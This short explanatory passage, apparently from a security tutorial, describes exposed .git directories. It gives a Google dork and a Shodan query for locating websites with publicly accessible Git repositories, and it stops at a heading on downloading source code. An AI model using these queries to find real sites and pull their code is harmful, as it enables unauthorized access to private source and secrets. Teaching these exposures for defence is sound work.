Insecure Source Code Management refers to the inadequate protection and handling of source code repositories, leading to vulnerabilities and potential unauthorized access to sensitive code.
Following the best practices in cybersecurity, the .git directory should not be accessible to the public, but some software engineers are neglecting this practice and are simply uploading the entire project to the internet, and this is when information leaks occur.
By simply searching for the following Google Dork intitle:"Index of /.git", any user can find websites with a publicly exposed and accessible Git Repository.
Shodan is the search engine for everything on the internet. Using the following query http.title:"Index of /" http.html:".git", it will return you a list of websites with exposed .git repository.
Downloading src code from a .git url